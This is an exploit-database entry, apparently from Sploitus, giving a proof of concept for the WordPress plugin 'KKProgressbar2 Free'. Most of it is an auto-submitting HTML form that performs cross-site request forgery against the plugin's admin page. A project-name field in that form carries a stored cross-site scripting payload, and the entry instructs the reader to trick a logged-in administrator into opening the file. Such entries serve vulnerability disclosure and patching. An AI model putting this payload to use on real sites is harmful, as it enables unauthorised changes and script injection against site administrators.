Share
## https://sploitus.com/exploit?id=WPEX-ID:7B0046D4-CF95-4307-95A5-9B823F2DAAAA
Make a logged in admin open an HTML file containing:

```
<body onload="document.forms[0].submit()">
    <form action="http://example.com/wp-admin/admin.php?page=kkpb-menu" method="post">
        <input type="hidden" name="action" value="save-project">
        <input type="hidden" name="kkpb_project_name" value='"><script>alert(/XSS/)</script>'>
        <input type="hidden" name="kkpb_project_link" value="csrf">
        <input type="hidden" name="kkpb_project_description" value="<p>csrf</p>">
        <input type="hidden" name="kkpb-auto" value="on">
        <input type="hidden" name="kkpb_procent" value="0">
        <input type="hidden" name="kkpb-input-name[]" value="">
        <input type="hidden" name="kkpb-input-auto[]" value="">
        <input type="hidden" name="kkpb-input-progress[]" value="">
        <input type="hidden" name="kkpb-input-all[]" value="">
        <input type="hidden" name="kkpb-input-now[]" value="">
        <input type="hidden" name="kkpb-input-status[]" value="1">
    </form>
</body>
```

XSS will trigger on the "KKProgressbar2 Free" menu